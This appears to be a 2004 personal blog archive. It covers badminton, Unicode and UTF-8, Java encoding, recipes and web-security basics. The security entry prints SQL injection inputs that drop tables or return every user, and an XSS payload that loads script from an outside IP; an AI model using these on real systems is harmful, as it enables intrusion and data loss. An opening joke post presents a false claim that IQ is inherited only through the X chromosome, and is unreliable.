2004年11月09日

说决定智商的八对基因全部都是位于X染色体上面,然后男生是XY,X是来自母亲,Y是
来自父亲。所以男生的智商全部都是来自母亲的遗传。然后女生是XX,所以女生的智
商是父亲跟母亲各有一半影响。然后说,因为女生的智商是父亲母亲都有影响,所以会
有中和的效应。所以女生智商的分布会呈现自然分布(normal distribution),就是倒钟
状,中间最多,两边较少。然后男生因为是完全只受一方影响,所以男生智商分布会
呈现在偏向在两个极端。也就是说,男生天才比较多,但是同时,蠢材之中也是男生特
别多。

这个故事告诉我们什么?

1、「你要判断一个男生聪不聪明,看他妈妈就知道了。」

2、 然后我们用机率来算:生男孩的机率=1/2,生女孩的机率=1/2。
生男孩的时候,母亲对于男孩智商的影响力 = 1。
生女孩的时候,母亲对于女孩智商的影响力 = 1/2。
所以说母亲跟父亲对于下一代智商的影响力(期望值)的比例是:
1*1/2 + 1/2*1/2 : 0*1/2+ 1/2*/12 =0.75:0.25 = 3 : 1 = 母:父

所以说, 如果你:

1 、是男生,如果你觉得你很笨的话。你千万要娶一个聪明的女生来。这样你小孩翻
盘的机率还有七成五,人生还是充满了希望。

2 、是女生,如果你觉得你很笨的话,因为,你翻人家盘的机率有七成五…..

3 、当你看到一个男生很聪明的时候,则,他父亲很聪明的机率是0%
(应该说,就算他父亲很聪明,也对他是没有影响的),可是他母亲很聪明的机率是
100%。所以说,如果你在考虑要嫁给一个很聪明的男生的时候,你就要小心他妈妈,可能会
是一个很会算计的婆婆。反之,当你看到一个男生很笨的时候,没错,他通常会很有
钱,这是上帝的安排,上帝为了不让人类灭亡,所以他会让很笨的人很有钱,这样他才能
娶到聪明的女生。

总之,当你看到很笨的男生的时候,不要犹豫,嫁给他。不要觉得你是为了他的钱,
你要跟自己说,你是为了要改善人类未来的基因。

以上三个结论为:人类智商理性铁蛋定律。

重复一次:

1、判断男生智商,看妈妈。

2、笨男生无论如何也要娶聪明女生。

3、女生不要嫁聪明男生,应该嫁给笨男生

2004年11月08日

本人的高远球还算马马虎虎,如果感觉找到了,回后场还是没什么问题的.但问题是,现在回高远球全凭感觉,对高远球的技术要领不是很清楚,一旦找不到感觉,就不知道该怎么正确的做动作,结果是既费力,又打不到后场.今天,一位打的很好的女球友给我指正说,我的击球点不稳定,有时击球点太靠后.正确的击球点应该是在人的前上方,这样发力才是向前的,而不是在头顶或者别的什么地方.感觉她好像说道了我的问题所在.

下面,我们就来谈谈回高远球的方法.上手击高远球分为:正手击高远球;反手击高远球;头顶高远球。

正手击高远球 这是羽毛球上手击高远球技术中的基础。 击球前的准备动作要领 首先判断来球的方向和落点,侧身后退使球在自己右肩稍前上方的位置,左肩对网,左脚在前,右脚在后,重心在右脚上左臂屈肘,左手自然高举,右手持拍,大小臂自然弯曲,将球拍举在右肩上方,两眼注视来球。击球时,由准备动作开始,大臂后引,随之关节上提明显高于肩部,将球拍后引至头后,自然伸腕(拳心朝上),然后在后脚蹬地、转体和腰腹的协调用力下,以肩为轴,大臂带动小臂快速向前上方甩动手腕,在手臂伸直的最高点击球。击球后,持拍手臂顺惯性往前下方挥动并收拍至体前。与此同时,左脚后撤,右脚向前迈出,身体重心由后脚移到前脚。 正手击高远球可以用不起跳或起跳进行击球。后者是为了争取高点击球,以赢得时间上的主动,但对步法技术和体力要求较高。因此,初学者一般先学不起跳正手击高远球。待熟练掌握后,再根据自己的特点和场上的情况综合运用这两种击球方式。 正手击高远球时易犯的错误 击球点选择不当,偏前或偏后,影响击球用力;击球时,不是以肩为轴挥臂,而是以肘为轴,影响大臂发力,造成用力不当;击球时不是用挥臂甩腕动作靠“爆发力”把球击出,而是将球“推”出;击球后球拍不是顺惯性朝前下方挥动并收拍至体前,而是将球拍朝下;朝右后方挥动,影响了手臂的用力;击球时全身用力不协调等。
  
反手击高远球 当对方将球击到本方左后场内,以反手将球击回对方底线去的高远球击球法称之反手击高远球。它的特点是节省体力,对步法要求也不高,朝被动情况下,可采用反手击高远球过渡,帮助自己重新调整站位。 动作要领 首先判断准对方来球的方向和落点,迅速将身体转向左后方,步法到位后,右脚前交叉跨到左侧底线,背对网,身体重心在右脚上,使球在身体的右肩上方。击球前,由正手握拍迅速换为反手握拍,并持拍于胸前,拍面朝上。击球时,以大臂带动小臂,通过手腕的闪动、自上而下的甩臂将球击出。在最后用力时,要注意拇指的侧压力与甩腕的配合,同时还要利用两腿的蹬地、转体等协调全身用力。 初学者用反手击高远球时,往往容易出现步子不到位,击球点掌握不好。击球时,未用拇指的侧压力;击球刹时用力过早或过迟,没有用在“点”上等等错误。这要通过反复的练习和体会才能逐渐掌握正确的击球动作。
  
头顶击高远球 在自己的左后场区,用正手在头顶中间部位或在左肩上方将来球击到对方底线去的高远球击球法称头顶击高远球。这种击球动作是我国运动员对羽毛球技术发展的一项贡献。它较反手击球主动性强,具有更大的攻击性,初学者应努力学好头顶击高远球技术。 动作要领 击球前的准备姿势以及击球动作同正手击高远球基本一致。不同的是头顶击高远球的击球点在左肩上方(因为球是飞向左后角的)。准备击球时,侧身(左肩对网)稍左后仰。击球时,大臂带动小臂使球绕过头顶,从左上方向前加速挥动,在用力击球时,注意发挥手腕的爆发力和充分利用蹬地以及收腹的力量。击球后,左脚在身后着地并立即回蹬,同时右脚前移,重心移至右脚。 头顶击高远球虽然对步法、全身的协调能力有较高的要求,但一旦掌握其动作要领并能坚持在平时的练习和比赛中主动运用它,那将会大大提高在左后场区击球的攻击性。

2004年11月06日

ISO10646 和 UCS
国际标准 ISO 10646 定义了 通用字符集 (Universal Character Set, UCS).UCS 是所有其他字符集标准的一个超集. 它保证与其他字符集是双向兼容的. 就是说, 如果你将任何文本字符串翻译到 UCS格式, 然后再翻译回原编码, 你不会丢失任何信息.

UCS 包含了用于表达所有已知语言的字符. 不仅包括拉丁语,希腊语, 斯拉夫语,希伯来语,阿拉伯语,亚美尼亚语和乔治亚语的描述, 还包括中文, 日文和韩文这样的象形文字, 以及 平假名, 片假名, 孟加拉语, 旁遮普语果鲁穆奇字符(Gurmukhi), 泰米尔语, 印.埃纳德语(Kannada), Malayalam, 泰国语, 老挝语, 汉语拼音(Bopomofo), Hangul, Devangari, Gujarati, Oriya, Telugu 以及其他数也数不清的语. 对于还没有加入的语言, 由于正在研究怎样在计算机中最好地编码它们, 因而最终它们都将被加入. 这些语言包括 Tibetian, 高棉语, Runic(古代北欧文字), 埃塞俄比亚语, 其他象形文字, 以及各种各样的印-欧语系的语言, 还包括挑选出来的艺术语言比如 Tengwar, Cirth 和 克林贡语(Klingon). UCS 还包括大量的图形的, 印刷用的, 数学用的和科学用的符号, 包括所有由 TeX, Postscript, MS-DOS,MS-Windows, Macintosh, OCR 字体, 以及许多其他字处理和出版系统提供的字符.

ISO 10646 定义了一个 31 位的字符集. 然而, 在这巨大的编码空间中, 迄今为止只分配了前 65534 个码位 (0×0000 到 0xFFFD). 这个 UCS 的 16位子集称为 基本多语言面 (Basic Multilingual Plane, BMP). 将被编码在 16 位 BMP 以外的字符都属于非常特殊的字符(比如象形文字), 且只有专家在历史和科学领域里才会用到它们. 按当前的计划, 将来也许再也不会有字符被分配到从 0×000000 到 0×10FFFF 这个覆盖了超过 100 万个潜在的未来字符的 21 位的编码空间以外去了. ISO 10646-1 标准第一次发表于 1993 年, 定义了字符集与 BMP 中内容的架构. 定义 BMP 以外的字符编码的第二部分 ISO 10646-2 正在准备中, 但也许要过好几年才能完成. 新的字符仍源源不断地加入到 BMP 中, 但已经存在的字符是稳定的且不会再改变了.

UCS 不仅给每个字符分配一个代码, 而且赋予了一个正式的名字. 表示一个 UCS 或 Unicode 值的十六进制数, 通常在前面加上 “U+”, 就象 U+0041 代表字符”拉丁大写字母A”. UCS 字符 U+0000 到 U+007F 与 US-ASCII(ISO 646) 是一致的, U+0000 到 U+00FF 与 ISO 8859-1(Latin-1) 也是一致的. 从 U+E000 到 U+F8FF, 已及 BMP 以外的大范围的编码是为私用保留的.

UCS里有些编码点分配给了组合字符.它们类似于打字机上的无间隔重音键. 单个的组合字符不是一个完整的字符. 它是一个类似于重音符或其他指示标记, 加在前一个字符后面. 因而, 重音符可以加在任何字符后面. 那些最重要的被加重的字符, 就象普通语言的正字法(orthographies of common languages)里用到的那种, 在 UCS 里都有自己的位置, 以确保同老的字符集的向后兼容性. 既有自己的编码位置, 又可以表示为一个普通字符跟随一个组合字符的被加重字符, 被称为 预作字符(precomposed characters). UCS 里的预作字符是为了同没有预作字符的旧编码, 比如 ISO 8859, 保持向后兼容性而设的. 组合字符机制允许在任何字符后加上重音符或其他指示标记, 这在科学符号中特别有用, 比如数学方程式和国际音标字母, 可能会需要在一个基本字符后组合上一个或多个指示标记.组合字符跟随着被修饰的字符. 比如, 德语中的元音变音字符 (“拉丁大写字母A 加上分音符”), 既可以表示为 UCS 码 U+00C4 的预作字符, 也可以表示成一个普通 “拉丁大写字母A” 跟着一个”组合分音符”:U+0041 U+0308 这样的组合. 当需要堆叠多个重音符, 或在一个基本字符的上面和下面都要加上组合标记时, 可以使用多个组合字符. 比如在泰国文中, 一个基本字符最多可加上两个组合字符.

Unicode
在计算机应用领域中存在着几十种互不相同的字符集,这种编码的不统一给信息信息交换带来了诸多不便,同时也使得软件在国际化和本地化方面困难重重.unicode就是为了解决这一现状而产生的,它的目的是成为涵盖全世界各种文字的字符集.

Unicode是一种双字节编码机制的字符集,每个字符固定长度,使用0-65535之间的双字节无符号整数对每个字符进行编码。在Unicode字符集中,至少可以定义65536个不同的字符,足以应付目前绝大多数场合的需要。 Unicode 标准 严密地包含了 ISO 10646-1 实现级别3的基本多语言面. 在两个标准里所有的字符都在相同的位置并且有相同的名字.

UCS 和 Unicode 只是分配整数给字符的编码表。在存储和传输过程种,它有专门的编码方式,以减少流量.常用的编码方式有UTF-8, UTF-16。

UTF-8
unicode的压缩编码方式。UTF-8 是一种不等幅的编码方式,UTF-8编码的字节长度取决于所要编码的字符在ISO 10646中的编码值。在UTF-8中,不同的字符,理论上可以最多到 6 个字节长, 然而 16 位 BMP 字符最多只用到 3 字节长。对于单字节的UTF-8编码,该字节的最高位为0,其余7位用来对字符进行编码(等同于ASCII码)。对于多字节的UTF-8编码,如果编码包含n个字节,那么第一个字节的前n位为1,第一个字节的第n+1位为0,该字节的剩余各位用来对字符进行编码。在第一个字节之后的所有的字节,都是最高两位为”10″,其余6位用来对字符进行编码。

下面是Unicode编码和utf-8编码之间的对应关系表。中文的Unicode编码范围在0000 0800-0000 FFFF 中。
    Char. number range   |        UTF-8 octet sequence
       (hexadecimal)     |              (binary)
    ———————+———————————————
 U-00000000 – U-0000007F |  0xxxxxxx 
 U-00000080 – U-000007FF |  110xxxxx 10xxxxxx 
 U-00000800 – U-0000FFFF |  1110xxxx 10xxxxxx 10xxxxxx 
 U-00010000 – U-001FFFFF |  11110xxx 10xxxxxx 10xxxxxx 10xxxxxx 
 U-00200000 – U-03FFFFFF |  111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 
 U-04000000 – U-7FFFFFFF |  1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 
xxx 的位置由字符编码数的二进制表示的位填入. 越靠右的 x 具有越少的特殊意义. 只用最短的那个足够表达一个字符编码数的多字节串. 注意在多字节串中, 第一个字节的开头”1″的数目就是整个串中字节的数目.

例如: Unicode 字符 U+00A9 = 1010 1001 (版权符号) 在 UTF-8 里的编码为:
11000010 10101001 = 0xC2 0xA9

而字符 U+2260 = 0010 0010 0110 0000 (不等于) 编码为:
11100010 10001001 10100000 = 0xE2 0×89 0xA0

 

UTF-12
unicode的压缩编码方式。UTF-16也是Unicode的变形表示方式的一种。它的目的是维持双八位的编码方式,同时也用一些特殊的双八位来表示ISO 10646中非基本多文种平面(BMP)中的一些字符。这种用来表示非BMP字符的方法在Unicode中称作代理对机制。代理对的编码机制以及原先不需要代理对的六万三千多个基本 Unicode 码,合起来叫做UTF-16。也就是说UTF-16 基本上就是 Unicode双字节编码的实现,再加上一个应付未来扩充需要的编码机制。

UTF-16编码遵循下述原则: 对于字符编码值小于0×10000的字符,则直接把编码值转化为一个相等的16位整数。对于字符编码值在0×10000到0×10FFFF之间的字符,将用一个0xD800到0xDBFF(代理高部)之间的16位数,后面紧跟一个0xDC00到0xDFFF(代理低部)之间的16位数来表示。字符编码值大于0×10FFFF的字符将不能用UTF-16来表示。

常用字符集
规范名称   语言国家
US-ASCII   英语
UTF-8    压缩的Unicode
UTF-16   压缩的UCS
ISO-10646-UCS-2  原Unicode
ISO-10646-UCS-4  原UCS
ISO-8859-1   Latin-1,西欧语言
ISO-8859-2   Latin-2,东欧语言
ISO-8859-3   Latin-3,南欧语言
ISO-8859-4   Latin-4,北欧语言
ISO-8859-5M   ASCII加西里尔语言
ISO-8859-6   ASCII加阿拉伯语言
ISO-8859-7   ASCII加希腊语言
ISO-8859-8   ASCII加希伯来语言
ISO-8859-9   Latin-5,土耳其语言
ISO-8859-10   Latin-6,西欧
ISO-8859-13   Latin-7,ASCII码加波罗的海周边语言和独特的拉托维亚语
ISO-8859-14   Latin-8,ASCII码
ISO-8859-15   Latin-9,Latin-10,西欧
ISO-2022-JP   日语
Shift-JIS   日文Windows
EUC-JP   日文Unix
Big5    汉语,中国台湾
GB2312   汉语,中国大陆
KOI8-R   俄语
ISO-2022-KR   朝鲜语
EUC-KR   朝鲜语,Unix
ISO-2022-CN   汉语

 

java中的String

Java中的String类型支持Unicode,它在内部用UTF-16来表示字符串,同时,String类还提供了操作字符编码的各种方法。

首先,当你创建一个String对象时,你除了要提供原始字节流(byte[]), 还要提供一个编码方式(charset), 以说明你所提供的原始字节流是以什么形式编码的(如果不提供,则认为是系统当前的编码方式)。然后,String类会把原始字节流当成你所声称的编码方式,转换成unicode的UTF-16形式,存储在内部。如下图:
  orient byte[] ——————->   byte[] in String
  ( X charset )                        ( UTF-16)

其次,当你要从String对象取得字节流时(byte[]),你也要说明你想要得到的字节流的编码方式。然后,String类会把存储在内部的UTF-16格式的字节流转换成你所要的编码方式,返还给你。如下图:
  byte[] in String ——————-> destination byte[]
  ( UTF-16 )                            ( x charset )

利用以上两种操作,你就可以转换字符串的编码方式。比如,你写代码的编辑器不支持中文,那么你输入的中文字符串就会被当作ISO8859-1编码形式,在输出时就会是一串乱码。为此,你的代码需要为:
  String orientStr = new String(“中文字符串”); // 由编辑器不支持中文,“中文字符串”被当成ISO8859-1编码,结果是乱码
  byte[] orientBytes = orientStr.getBytes();   // 默认为ISO8859-1, 得到原始字节流
  String resultStr = new String(orientBytes, “gb2312″);

 

2004年11月01日

今天是周一,很难得,不用上班:-) 前两天公司组织去浙江桐庐玩了两天,昨晚八点才到的家,然后紧接着就休一星期得假,感觉满爽的.不过,早晨一个人在家,竟然感到有些不习惯,爷爷的:)

不管怎样,有一件事是无论如何都要做的,那就是吃饭.不是自夸,本人的做饭水平还是可以的,一个人在外绝对不会亏待了咱的胃.就像今天,我就决定给自己烧两个小菜吃吃,下面是我的菜谱:

鱼香白菜

主料:  白菜;

调料: 豆瓣辣酱,盐,酱油,醋,糖, 料酒, 葱,姜,蒜,淀粉;

做法: 葱, 姜,蒜切末, 然后和酱油,醋,糖,料酒,淀粉搅拌均匀, 搅拌时加少量水; 把白菜帮切成麻将大小小块,下油锅热炒至熟;最后放入调好的料和少量盐,均匀;

蘑菇鸡汤

主料:  鸡块(翅膀肉), 蘑菇, 香菇, 草菇, 金针菇;

调料: 盐, 料酒, 葱,姜;

做法:  鸡块入锅, 一次性加入所需的水,煮沸; 去沫, 加入料酒,姜, 用中小火炖;至鸡块烂时, 放入菇, 加盐, 炖至蘑菇熟,最后放入少量葱末;

 

2004年10月29日
  1. Introduction

The essential idea of a Buffer Overflow is based on putting too much information into undersized receptacles. Since the end result could crash the system or smack the memory stacks, Buffer Overflows are also referred to as smashing the stack. In many programming languages, the developer of a program allocates a certain amount of space for variables.

Attackers often try to overflow that space. The attacker gives the program more data than the developer has allocated for that variable. This extra data provided by the attacker is going to spill out, potentially changing the way the program runs and executing code on behalf of the attacker.

Based on the desired outcome and the relative sophistication of how the attack is launched, there are two types of Buffer Overflow attacks.

  1. To Crash the System:       Attacker sends a large amount of information for a given input variable. If proper error checking is not performed, the input will overwrite other data on the stack and potentially crash the system.
  2.  To Gain Access:       Attacker crafts their data so they can have arbitrary code run on the victim system which could lead to access.

Buffer Overflows are caused by not having proper bounds checking in the software. Users are asked what country they live in, an attacker might type in that he or she is a resident of %90 %90 %90 %90 and so on. Usually attackers enter raw elements of machine language code that the attack wants to execute on the target box.

 

  1. Example

 

To better understand how Buffer Overflows work, let’s examine how a normal  program manipulates and uses the memory stack. The stack is a location in memory where a running program places data associated with function calls. Every running process on your machine has its own version of the stack.

When a function call is made, the first things to get pushed on the stack are the

function call arguments. Then the system pushes the return pointer on the stack.

This is return pointer is crucial. The purpose of the return pointer is to indicate where in the calling program we are going to return after the function call finishes running. Remember the function call has a return statement? When it gets to the return statement, the program has to know where to go back in the main program to resume execution. The return pointer, stored on the stack, tells the system where to resume execution in the main program after the function call reaches its return statement. Next on the stack, the system allocates space for various local buffers; these are local variables of the function.

        |          buffer 2                |         button of memory
        |    ( local variable 2)         |             |
        |——————————- |             |   
        |         buffer 1                 |              |   fill direction
        |    ( local variable 1)         |             |
        |——————————–|             |
        |         return pointer         |             \/
        |——————————–|                
        |        function call args      |        Top of memory
        |                                     |

 

When programs don’t check and limit the amount of data copied into a variable’s assigned space, that variable’s space can be overflowed. When that buffer is  overflowed, the data placed in the buffer will go into the neighboring variables’ space and eventually into the return pointer space. Attackers take advantage of
this by precisely tuning the amount and contents of user input data placed into an overflow-able buffer.

If a user is utilizing the program as intended, the Buffer Overflow may never be noticed. It is not until someone enters in a large amount of data as input and the system crashes that the lack of bounds checking may be discovered.

To gain access to the system via a Buffer Overflow, the data that the attacker sends usually :

    1. Consists of machine specific bytecode (low level binary instructions) to execute a command.
    2. Contains a new address for the return pointer.
    3. Points back into the address space of the stack, causing the program to run the attacker’s instructions when it attempts to return from the function call.

In this case: The user data is written into the allocated buffer by the subroutine. If the data size is not checked, the return pointer can be overwritten by user data. Attacker exploits and places machine code in the buffer and overwrites the
return pointer. When function returns, attacker’s code is executed.

 

   |

   |      |          buffer 2                          |         button of memory
  \/      |    ( local variable 2)                   |             
  
à
  |——————————-  |             
  |       |         machine code:                  |         buffer 1 space is overwritten   
  |       |    execute(/bin/sh )                   |             
  |       |——————————– |             
   —-  |         return pointer                   |          return pointer is overwritten  

          |       to exec code                      |
   
      |——————————– |                
          |        function call args                |        Top of memory
          |                                               |

The return pointer plays a critical role in Buffer Overflow attacks. When executing a subroutine, the return pointer tells the system the address of the instruction needed for the next function. By manipulating the return pointer, the system will go to the memory address that contains the attacker code as opposed to the real address.

  1. Defense

 

All of these functions listed are associated with the C and C++ programming languages. C and C++ are particularly problematic with Buffer Overflows and you have to be very careful in programming in them.

strcpy

strncpy

strcat

sprintf

scanf

fgets

gets

getws

memcpy

memmove

 

Buffer Overflows are still possible (although far less likely) in Java, Perl, C#, .NET, and other languages. These other languages have more inherent defenses against Buffer Overflow conditions, in that they perform bounds checking before the application writes the data to a variable. However, you always need to code defensively and should always check the size of user input, regardless of the language you use.

 

Since the stack is designed to hold items associated with function calls and shouldn’t contain executable code, an alternative way to defend against some Buffer Overflows is to change the way the stack works on some machines so that the system will not execute code from the stack.

 

Solaris has a built-in option that can be turned on to implement a nonexecutable system stack. Add the following to /ect/system:

set noexec_user_stack=1

set nonexec_user_stack_log=1

  1. Introduction

The attacker enters special characters and pieces of a SQL statement into their user input to see if they can get them to run on the back-end database, querying or updating data in an unauthorized fashion. There are some set attacks to try, but for the most part, SQL Injection is a trial and error attack with the goal of being able to do something an outsider should not be able to do.

select [field] from [table] where [variable] = ‘[value]’;

update [table] set <variable> = ‘<value>’;

With SQL Injection, the attacker tries to enter many special quote characters to see if they can make the application supply more information. Using SQL Injections involves following three steps.

In addition to the single quotes and double quotes, an attacker may try to enter in many different other characters to see if they can get the back-end database to send some information in return. They might even add individual elements of SQL syntax, including additional select or update statements. The goal is to get the database to operate in a way other than how it was intended to operate by the developers.

 

The most useful element in this list is probably the double dash (–). These characters act as a comment delimiter, and therefore, can be used to tell the database to ignore anything passed to it after the user’s input. That’s quite helpful in avoiding syntax errors induced by SQL Injection attacks.

 

  1. Example

 Suppose we have a Web Application that asks the user for a username, and then looks up the appropriate user ID in a SQL database. Our system will select the ID number from the users table where the name matches what the user types in as a username. The select statement appears on the slide.

select id from users where name = ‘[value]’;

 
Suppose an attacker types in a [value] of Fred followed by a single quote. The Web Application inserts the user input including the single quote into the [value] position of the select statement.

Fred’

 
The resulting SQL has a syntax error. The two single quotes after Fred will cause the SQL parser in the database to generate an error message. When attackers see syntax error, they assume they discovered a SQL Injection vulnerability.

select id from users where name = ‘Fred’’;


This is certainly interesting, but let’s see what an attacker can do once he/she has witnessed an error message based on the single quote.

 

After discovering the error message, the attacker types:

Fred’; drop table users;–

 
The Fred and single quote are followed by a semicolon. As far as the database is concerned, that semicolon will terminate the SQL statement it gets. However, the database will think it has received another SQL statement. This second statement tells it to drop the users table. This statement ends with a semicolon, followed by two dashes. The dashes are required to indicated that the remainder of the line (which will be a ’; applied by the Web application itself) are just part of a comment. Otherwise, the attacker will get another syntax error. The attacker doesn’t want syntax errors now; he/she wants to get SQL statements to execute on the target.

 

The resulting SQL statement:

select id from users where name = ‘Fred’; drop table users;–’;


The drop statement will implement a denial of service attack because the user table is now gone, thus preventing users from authenticating.

 

In addition to the previous attack,  attacker can  grab More Data. This time, the attacker types a username of

’ or 1=1;–  

because 1=1 is always true , so the database will think the username is ‘’ or TRUE. This will retrieve all user ID numbers from the database. Now, the first user created in a user table is usually the administrator of the system. Therefore, if an application gets a list of all users, it will likely just peel off the first user in the list. Without knowing the administrator’s name, the attacker can select the administrator’s user ID number by typing in a name of ‘ or 1=1;–. That could be very useful to the attacker.

 

 

  1. Defense

 

To defend against these attacks, you must build your Web Application so the server-side filters input because client-side filtering is too easy to bypass. By using pre-canned queries(for example , preparedstatement), the Web Application will not accept any new commands from the user and the impact of this attack will be minimized.

 

 

 

  1.  Introduction

 

As you know, SQL Injection attacks the back-end database by going through user input. Cross Site Scripting is an attack against the user’s browsers by going through the front end. Essentially the attacker tries to trick the end user to send data they should not be sending.

Cross Site Scripting allows an attacker to steal information (such as cookies) from users of a vulnerable Web site. So, if your online bank is vulnerable, an attacker might be able to steal your banking cookies.

  1. Example


Cross Site Scripting involves sending scripting code (usually JavaScript or VBScript) to a Web Application that sends data back to the browser. The Web server has an application that reflects user input back to a Web browser. When the code gets to the browser, it is executed.

 

For example, upon reaching a browser, the following script opens a dialog box.

 

%22%2Balert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%2B%22

 

Following is another example , which is more powerful because it will run any javascript from  another website in your current security context.

 

%3Cscript%20src%3D%22http%3A//61.129.115.50/e.js%22%3E%3C/script%3E

 

In user’s browser , it will be:

<script src=”http://61.129.115.50/e.js”></script>

 

 

  1. Defense

Remember, to defend against Cross Site Scripting attacks, you must build your Web Application so server-side filters input because client-side filtering is too easy to bypass.

Characters on the server side that can be used to implement Cross Site Scripting:

=   > < ‘ “ () ; &


So, Web Application Filters should  filter Single quotes, double quotes, semicolons, asterisks, percents, underscores, and other shell and meta-scripting characters.

 

But, before doing filter, you should decode the user input from URL_encoding to plain text. It is because some skilful attack will encoding their malicious cross-script with different schema. For example, the script below :

<script src=”http://61.129.115.50/e.js”></script>

 

Also can be encoded to following  with dynamic length UTF-8 schema:

%c0%bcscript%20src%c0%bd%22http://61.129.115.50/e.js%22%c0%be%c0%bc/script%c0%be

 

So, it is unfeasible to filter against the encoded characters. Instead, you should filter against  the plain text.

 

 

2004年08月03日

    When I use apache common valication utility to implement server side validation, I was often tiipped up by the Field name in the validation file.  By using javabean’s introspection ,  the field name of javabean is always  firist-letter lower caseed. So, If the field name in valication file is upcased,  common validation will throw exception.

 

2004年07月10日

I think cache is very important in Web application. A good cache machanism can dramatically improve the performace of web application and reduce the memory consumption .

Epicentric portal framework shipped a well implemented cache mechanism. So, it is worthy of spending time to have a detail look on it for me.  In addition, there is also a good article in following url: http://www.theserverside.com/articles/article.tss?l=Caching .